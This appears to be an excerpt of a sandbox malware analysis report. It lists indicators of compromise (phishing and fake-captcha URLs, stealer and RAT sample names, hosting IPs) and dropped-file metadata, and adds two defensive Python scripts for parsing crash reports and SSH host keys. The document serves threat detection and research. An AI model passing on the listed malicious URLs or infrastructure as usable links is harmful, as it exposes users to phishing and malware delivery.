DIGITALOCEAN-ASNUS | https://track.enterprisetechsol.com:443/z.z?l=aHR0cHM6Ly9pdGJ1c2luZXNzdG9kYXkuY29tL3VzLXByaXZhY3ktcG9saWN5Lw%3d%3d&r=14473740419&d=12037165&p=1&t=h&h=2406a96f7a060d97d21ab6ced86a8836 | malicious | Unknown | 104.248.15.35
DIGITALOCEAN-ASNUS | https://goeco.mobi/?sub1=ig&sub2=true&source=ss-landing&c=cpuv&url=https%3A%2F%2Ffrankyourn.com%2Fvknvktvt%2Ffkkff%2Fckaxckaxckaxckaxckax%2Fc2hpbGxpbmdlci1ib2JAbW9ucm9lY291bnR5LWZsLmdvdg%3D%3D&utm_content=&token= | malicious | HTMLPhisher | 167.71.212.59
DIGITALOCEAN-ASNUS | https://support.cch.com/productsupport/outsideLink.aspx?3724u=//baidu.com///link?url=YbqS9ny3nly5xaJswYPe6SWvsrfels6WNAyji7ebCiZ9N5wJmg0Jz_j9c07-SjRWat1l85ZBzUL1J5S3tD0Ce_%26wd%23.SEwtRk9VLU9TU0BjZHdlLmNvbS50dw== | malicious | Fake Captcha | 206.81.31.131
DIGITALOCEAN-ASNUS | https://support.cch.com/productsupport/outsideLink.aspx?3724u=//baidu.com///link?url=YbqS9ny3nly5xaJswYPe6SWvsrfels6WNAyji7ebCiZ9N5wJmg0Jz_j9c07-SjRWat1l85ZBzUL1J5S3tD0Ce_%26wd%23.SEwtRk9VLU9TU0BjZHdlLmNvbS50dw== | malicious | Fake Captcha | 206.81.31.131
SIBTEL-ASRU | rspro.exe | malicious | PrivateLoader, RisePro Stealer | 82.147.85.246
SIBTEL-ASRU | toolspub1.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader | 82.147.84.194
SIBTEL-ASRU | file.exe | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar | 82.147.84.194
SIBTEL-ASRU | toolspub1(1).exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader | 82.147.84.194
SIBTEL-ASRU | wefhrf.exe | malicious | Unknown | 82.147.85.194
SIBTEL-ASRU | wefhrf.exe | malicious | Unknown | 82.147.85.194
SIBTEL-ASRU | QHHuOVwGfL.exe | malicious | PureLog Stealer, zgRAT | 82.147.85.194
SIBTEL-ASRU | zRZvgGeA5A.exe | malicious | RedLine, zgRAT | 82.147.85.205
SIBTEL-ASRU | 3NzQY1wS2B.exe | malicious | PureLog Stealer, RedLine | 82.147.85.198
SIBTEL-ASRU | C7e8AncaYu.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT | 82.147.85.194
TUT-ASUS | 17075649093e1f08173f977f56d5a6074cf72a4a48f58106317565a0844aab156446d6e86e172.dat-decoded.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Dekont.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.95.112.1
TUT-ASUS | Dekont.pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.95.112.1
TUT-ASUS | 1eО.vbs | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | DA-0986789009008.bat.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | something.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | cotización para nuevo pedido.xla.xlsx | malicious | AgentTesla
                                                                                                    • 208.95.112.1
                                                                                                    17074938086a37925e51090cde88bb9b9cab9c2809900b2e7c2a2e6b8d9f8e8d3d3ee8799e367.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 208.95.112.1
                                                                                                    Nueva Orden de Compra 45035339504.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 208.95.112.1
                                                                                                    ESTADO DE CUENTA DHL - 69502.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e17075649093e1f08173f977f56d5a6074cf72a4a48f58106317565a0844aab156446d6e86e172.dat-decoded.exe | malicious | AgentTesla | 149.154.167.220
87645345.vbs | malicious | XWorm | 149.154.167.220
96874650.vbs | malicious | XWorm | 149.154.167.220
AlPDAGITIM F#U0130YAT TEKL#U0130F _PER 001 #U2026scanneed 00101.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 149.154.167.220
SOMGAZ PO NO6200125011.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
1e#U041e.vbs | malicious | AgentTesla | 149.154.167.220
751652433.vbs | malicious | XWorm | 149.154.167.220
387165243.vbs | malicious | XWorm | 149.154.167.220
DHL.exe | malicious | AgentTesla | 149.154.167.220
182763543.vbs | malicious | XWorm | 149.154.167.220
                                                                                                    No context
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.3631329385084094
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fNJVulDnA0Z4V4LSaKUbJlVNe6lZF6zuiFtZ24lO8qU:1JViDbZ4V4LSaJbrWhzuiFtY4lO8qU
                                                                                                    MD5:8DF9BDA50BBE3450B40A752EFDA35970
                                                                                                    SHA1:9087F9B044B5643151B6E880FA1D4662544B872E
                                                                                                    SHA-256:B1554ABADA649C3F418FB4061ECDFA48ED84929AF06F3757DB7AA55203585DB6
                                                                                                    SHA-512:2D2622EE1C7D2AECDA109F88963444C341338281CD6C1384BDFC2ED2A704EBC74622A3EC5CA4416E0E1B830D0AAAC0F7988CED27D4B2A135D283E213354BF175
                                                                                                    Malicious:false
                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.0.5.1.8.4.2.7.5.6.8.9.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.0.5.1.8.4.3.7.1.0.0.1.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.d.4.9.5.a.e.-.2.f.7.5.-.4.7.2.c.-.b.3.f.f.-.2.c.e.6.1.e.b.2.5.5.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.b.e.8.d.c.3.-.4.6.e.4.-.4.8.7.7.-.b.8.8.e.-.e.8.e.a.c.4.f.4.b.5.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.v.k.e.f.q.4.c.v...o.i.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.b.9.b.8.4.c.f.0.b.e.0.9.9.b.2.6.b.5.d.8.b.d.8.e.f.a.c.0.2.9.1.7.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.4.-.1.1.e.6.-.4.8.3.b.3.4.5.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.a.d.d.9.e.2.6.2.e.9.1.3.a.e.8.a.e.d.4.2.5.1.a.8.a.0.0.5.3.3.0.0.0.0.0.0.0.0.!.0.0.0.0.5.b.4.8.d.3.2.a.c.a.1.f.7.7.0.5.c.0.3.e.2.b.d.
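The Report.wer file above is the one artifact of the crash that outlives the payload: WerFault.exe records the faulting image's name (NsAppName=vkefq4cv.oil.exe) and, inside TargetAppId, the hex after "!0000" is the SHA-1 of the faulting image. In this report that hex (5b48d32aca1f7705c03e2bd, cut off by the preview) matches the leading digits of the SHA-1 listed later for the dropped PE (5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22). The following is an added example, not part of the Joe Sandbox report: it re-encodes the preview's key=value lines as the UTF-16LE file WerFault writes, parses them, pulls the embedded hash and correlates it with the dropped-file hash. The TargetAppId value is truncated exactly as the preview truncates it, so the correlation is a prefix match; a complete .wer file carries all 40 hex digits.

```python
"""Pull the faulting-image identity out of a Windows Error Reporting (.wer) file.

Added example, not from the Joe Sandbox report. The key=value lines are
transcribed from the report's preview of Report.wer; the TargetAppId value
is cut off in that preview, so it is cut off here too.
"""
import re

# Transcribed from the report preview (UTF-16LE renders as 'V.e.r.s.i.o.n'
# there); re-encoded below so the parser sees what WerFault actually wrote.
WER_TEXT = "\r\n".join([
    "Version=1",
    "EventType=CLR20r3",  # WER bucket for .NET unhandled exceptions
    "EventTime=133520518427568922",
    "ReportType=2",
    "Consent=1",
    "UploadTime=133520518437100160",
    "ReportStatus=524384",
    "ReportIdentifier=2dd495ae-2f75-472c-b3ff-2ce61eb255a3",
    "IntegratorReportIdentifier=75be8dc3-46e4-4877-b88e-e8eac4f4b516",
    "Wow64Host=34404",
    "NsAppName=vkefq4cv.oil.exe",
    "OriginalFilename=Hab9b84cf0be099b26b5d8bd8efac02917c.exe",
    "AppSessionGuid=00001f88-0001-0014-11e6-483b345cda01",
    # truncated in the report preview; a full value has 40 hex digits after '!0000'
    "TargetAppId=W:0006d6add9e262e913ae8aed4251a8a0053300000000!00005b48d32aca1f7705c03e2bd",
])
WER_BYTES = b"\xff\xfe" + WER_TEXT.encode("utf-16-le")

# SHA-1 of the dropped PE as listed in this report's dropped-files section.
DROPPED_PE_SHA1 = "5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22"


def parse_wer(data):
    """Decode a .wer file (UTF-16LE with BOM, or plain UTF-8) into a dict.

    Keys repeat in real reports (Sig[0].Name, Sig[1].Name, ...), so every key
    maps to the list of values seen, in file order.
    """
    if data.startswith(b"\xff\xfe"):
        text = data[2:].decode("utf-16-le")
    else:
        text = data.decode("utf-8", "replace")
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or "=" not in line:
            continue
        key, value = line.split("=", 1)
        fields.setdefault(key, []).append(value)
    return fields


_TARGET_APP_ID = re.compile(r"!0000([0-9a-fA-F]+)")


def image_sha1_from_target_app_id(target_app_id):
    """Return the lower-case hex WER embeds after '!0000' in TargetAppId, or None.

    That hex is the SHA-1 of the faulting image, so a .wer file left in the
    WER ReportArchive/ReportQueue folders still names the binary after the
    binary itself is gone.
    """
    m = _TARGET_APP_ID.search(target_app_id)
    return m.group(1).lower() if m else None


def matches_dropped_file(target_app_id, known_sha1):
    """True when the (possibly truncated) embedded hash is a prefix of known_sha1.

    Require at least 8 hex digits so a badly truncated value cannot match by
    accident; a complete 40-digit value has to match the whole hash.
    """
    embedded = image_sha1_from_target_app_id(target_app_id)
    if embedded is None or len(embedded) < 8:
        return False
    return known_sha1.lower().startswith(embedded)


def triage(data=WER_BYTES, known_sha1=DROPPED_PE_SHA1):
    """Everything a responder wants from the .wer in one dict."""
    fields = parse_wer(data)
    tai = fields.get("TargetAppId", [""])[0]
    return {
        "event_type": fields["EventType"][0],
        "crashed_image": fields["NsAppName"][0],
        "original_filename": fields["OriginalFilename"][0],
        "embedded_sha1": image_sha1_from_target_app_id(tai),
        "matches_dropped_pe": matches_dropped_file(tai, known_sha1),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print("%-20s %s" % (key, value))
```

On a live host, point `parse_wer` at the Report.wer files under the WER ReportArchive and ReportQueue directories and feed `matches_dropped_file` the hashes from your IOC list; a hit ties a crash record to a sample even when the file it describes has been deleted.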
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:Mini DuMP crash report, 16 streams, Sat Feb 10 15:17:23 2024, 0x1205a4 type
                                                                                                    Category:dropped
                                                                                                    Size (bytes):744738
                                                                                                    Entropy (8bit):2.9709841894198212
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:DnDLp7S/mYF0UhPrxl3ozejFDcN+hHzsZ4oakRPcLRxBzcSMpUNauA1CCq4/ngp6:v2zU+xzaIgE3MpTq4/gp3Qa6+2
                                                                                                    MD5:50CEE141B6A528A99DD4F05900D33751
                                                                                                    SHA1:D0CBEBBBF89C29E411F2D067C6B80E1A5C950BD1
                                                                                                    SHA-256:38F3BFD3A68F925464D525E9A676B382D9B17CD6A48C47C084E28293D0B82ADE
                                                                                                    SHA-512:4563D44FC5DD35B2BB9A9705A1861E698BB6F3544CAD3431704BF8A48873D6FF3CE141D1D7C86763717CDB65DA5B840034C44C86333763E9A60E3FB67BB3F1BB
                                                                                                    Malicious:false
                                                                                                    Preview:MDMP..a..... ..........e.........................%..........<....1...........1......._.."...........l.......8...........T............m..:...........pP..........\R..............................................................................eJ.......R......Lw......................T...........|..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9074
                                                                                                    Entropy (8bit):3.706987583444449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:R6l7wVeJeP9UK6YEfqGgmfZ22VKcJprP89bGbIfiCm:R6lXJe9UK6YECGgmfE2VHEGkfO
                                                                                                    MD5:B7EEBD7DDE9F9346C004426EF7E9285C
                                                                                                    SHA1:BBDC2419A74E5E87623CB49668CB64EF186A8EFB
                                                                                                    SHA-256:720E58F20F931C8990B2E2FC684F254003F95E54CF66E3E6F30D4120E7CEBBC1
                                                                                                    SHA-512:6C32FE678F258B6B3328511509BF3D642901D1AED046B46F773CD9FE1E9DF9FC55BE604182920975B4ABA7D49DD7EE7D2D6A2772F6BA33FFF96696C6FEDAF7FB
                                                                                                    Malicious:false
                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.2.<./.P.i.
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4845
                                                                                                    Entropy (8bit):4.480097738711733
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cvIwWl8zsTJg771I9snWpW8VYPYm8M4JEHqHFNIyq8vcHquyDg4Mhudd:uIjftI7vW7VnJHMWPuyDg4Mhwd
                                                                                                    MD5:C6C49753428EC5380CC37E96E3B673D3
                                                                                                    SHA1:0E2ECEB6D5FD08E35AAAEDB57594070504AAC059
                                                                                                    SHA-256:3FF9C8077B9660804B2B607CFBEACD83E8143FE545E83508B4A365EF257A6FEC
                                                                                                    SHA-512:F0AA8DBA794AE193837D5322361461A12609F306E0193F6EFEB03989B9DF3976B21F341A2DFCD04CA8E9CD5AD8C594362244013A673AA534AE6AB889871AA7E9
                                                                                                    Malicious:false
                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="187580" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                    Process:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    File Type:ASCII text, with very long lines (404), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):406
                                                                                                    Entropy (8bit):5.90555968999191
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TyFqFcWmedrh+bMcBVM5uUkZq0lbUMO9wHWSSlICnoF/:dmgSbMcBVM5A409Kw1SlIQ+/
                                                                                                    MD5:EC266D309CBAD86B3E4939F2117DFE39
                                                                                                    SHA1:CF12599FBDC167B4C01B518A0BD63D51CD83798B
                                                                                                    SHA-256:2F8ECCA5380615BCD1530817933A7EA03D2D4FDC7D6E634829AA54E40413B05D
                                                                                                    SHA-512:D2D39D9174F459146DE57C205979E7815829C37EAFD214CDCE88F90A961F04E5468290E530CF31B9B621276A86EB3A071BBF3464962E1A8E44A7478794571BAA
                                                                                                    Malicious:false
                                                                                                    Preview:serveo.net,138.68.79.95 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxYGqSKVwJpQD1F0YIhz+bd5lpl7YesKjtrn1QD1RjQcSj724lJdCwlv4J8PcLuFFtlAA8AbGQju7qWdMN9ihdHvRcWf0tSjZ+bzwYkxaCydq4JnCrbvLJPwLFaqV1NdcOzY2NVLuX5CfY8VTHrps49LnO0QpGaavqrbk+wTWDD9MHklNfJ1zSFpQAkSQnSNSYi/M2J3hX7P0G2R7dsUvNov+UgNKpc4n9+Lq5Vmcqjqo2KhFyHP0NseDLpgjaqGJq2Kvit3QowhqZkK4K77AA65CxZjdDfpjwZSuX075F9vNi0IFpFkGJW9KlrXzI4lIzSAjPZBURhUb8nZSiPuzj..
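The file above is an OpenSSH known_hosts entry written by the system's ssh.exe: the sample accepted the host key of serveo.net (138.68.79.95), a public SSH tunnelling service, so the host key itself becomes a pivot. The following is an added example, not part of the Joe Sandbox report: it parses the dropped line exactly as copied from the preview, checks that the key type column agrees with the type inside the base64 blob, decodes the SSH wire format to recover the RSA exponent and modulus size, and computes the SHA256 fingerprint in the form `ssh-keygen -lf` prints, so the value can be compared against other reports or telemetry. It also flags hashed host entries (`|1|salt|hash`), which known_hosts may contain and which cannot be reversed to a hostname.

```python
"""Parse an OpenSSH known_hosts entry into IOC-grade facts.

Added example (not part of the Joe Sandbox report). The line below is copied
verbatim from the known_hosts file the sandbox saw ssh.exe drop.
"""
import base64
import hashlib
import struct

KNOWN_HOSTS_LINE = (
    "serveo.net,138.68.79.95 ssh-rsa "
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQDxYGqSKVwJpQD1F0YIhz+bd5lpl7Ye"
    "sKjtrn1QD1RjQcSj724lJdCwlv4J8PcLuFFtlAA8AbGQju7qWdMN9ihdHvRc"
    "Wf0tSjZ+bzwYkxaCydq4JnCrbvLJPwLFaqV1NdcOzY2NVLuX5CfY8VTHrps4"
    "9LnO0QpGaavqrbk+wTWDD9MHklNfJ1zSFpQAkSQnSNSYi/M2J3hX7P0G2R7d"
    "sUvNov+UgNKpc4n9+Lq5Vmcqjqo2KhFyHP0NseDLpgjaqGJq2Kvit3QowhqZ"
    "kK4K77AA65CxZjdDfpjwZSuX075F9vNi0IFpFkGJW9KlrXzI4lIzSAjPZBUR"
    "hUb8nZSiPuzj"
)


def _read_string(blob, offset):
    """Read one SSH wire-format string: uint32 big-endian length, then bytes."""
    if offset + 4 > len(blob):
        raise ValueError("truncated SSH key blob")
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start, end = offset + 4, offset + 4 + length
    if end > len(blob):
        raise ValueError("truncated SSH key blob")
    return blob[start:end], end


def parse_known_hosts_line(line):
    """Split a known_hosts line into hosts, key type, raw key blob and fingerprint.

    Accepts an optional leading '@marker' field (e.g. @cert-authority) and
    marks hashed host fields ('|1|salt|hash'), which cannot be reversed.
    """
    fields = line.strip().split()
    marker = None
    if fields and fields[0].startswith("@"):
        marker = fields.pop(0)
    if len(fields) < 3:
        raise ValueError("known_hosts line needs hosts, key type and key")
    hosts_field, key_type, key_b64 = fields[0], fields[1], fields[2]
    blob = base64.b64decode(key_b64, validate=True)
    # The key type appears twice: as the text column and as the first string
    # inside the blob. A mismatch means the line was edited or corrupted.
    inner_type, _ = _read_string(blob, 0)
    if inner_type.decode("ascii", "replace") != key_type:
        raise ValueError("key type column does not match key blob")
    digest = hashlib.sha256(blob).digest()
    # ssh-keygen -lf prints the SHA256 digest base64-encoded without '=' padding.
    fingerprint = "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")
    hashed = hosts_field.startswith("|1|")
    return {
        "marker": marker,
        "hashed": hashed,
        "hosts": [] if hashed else hosts_field.split(","),
        "key_type": key_type,
        "blob": blob,
        "fingerprint": fingerprint,
    }


def decode_rsa_public_key(blob):
    """Return (e, modulus_bits) from an 'ssh-rsa' public key blob."""
    key_type, off = _read_string(blob, 0)
    if key_type != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key: %r" % key_type)
    e_bytes, off = _read_string(blob, off)
    n_bytes, off = _read_string(blob, off)
    if off != len(blob):
        raise ValueError("trailing bytes after RSA modulus")
    e = int.from_bytes(e_bytes, "big")
    n = int.from_bytes(n_bytes, "big")  # mpint: a leading 0x00 keeps it positive
    return e, n.bit_length()


def summarize(line=KNOWN_HOSTS_LINE):
    """Everything a hunter would pull from the entry, as one dict."""
    entry = parse_known_hosts_line(line)
    e, bits = decode_rsa_public_key(entry["blob"])
    return {
        "hosts": entry["hosts"],
        "hashed": entry["hashed"],
        "key_type": entry["key_type"],
        "rsa_e": e,
        "rsa_bits": bits,
        "fingerprint": entry["fingerprint"],
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print("%-12s %s" % (key, value))
```

The fingerprint is what to record: hostnames and IPs behind a tunnelling service change, but a reverse-tunnel client pinned to this host key will keep accepting the same fingerprint, and any later known_hosts drop carrying it points at the same infrastructure.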
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:CSn:CSn
                                                                                                    MD5:FCF1D8D2F36C0CDE8ECA4B86A8FE1DF8
                                                                                                    SHA1:C7F9B0FB437533FBD302CC7DCA6D68E101ADCE87
                                                                                                    SHA-256:AA522A6BEECBEB04BEAA3F2818524C5FA79D01549B7F330F0CC0DAF925A080EE
                                                                                                    SHA-512:893B79C9DD383A0E024CD278921A99DF9EB60CEDC67C69580518016664BA11829801FF0E8CE87035B3050E616FBEE84D04CABCD4C9D90451D236A481B348E8D5
                                                                                                    Malicious:false
                                                                                                    Preview:6787
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQEAHKKkKYHKGSI6oPtHTH0
                                                                                                    MD5:578A9969E472E71F38254887263D82A4
                                                                                                    SHA1:8ED7FC31B0F6660DBAC702BC603FBF4FE88B2F5D
                                                                                                    SHA-256:AB8369CDA9CB7709E00867CE5460553393ABF742CBD58501AD6113FDF884B938
                                                                                                    SHA-512:E55F7150298EF037848826E79EB72AD03D3D75C278D91CF0EA6AE3C04B89D4ABBD7BD2D5EB274715687012B90F51D53056F01CDBF5DDBB602711E66909C8BD87
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..
                                                                                                    Process:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1119
                                                                                                    Entropy (8bit):5.345080863654519
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                    MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                    SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                    SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                    SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2240
                                                                                                    Entropy (8bit):5.379131272179432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZWSU4y4RQmFoUeWmfgZ9tK8NPP8m7u1iMugei/ZPUyuE:ZLHyIFKL3IZ2KHVOugsE
                                                                                                    MD5:BAE959C907A8BF1C9DA9D7779AEAB956
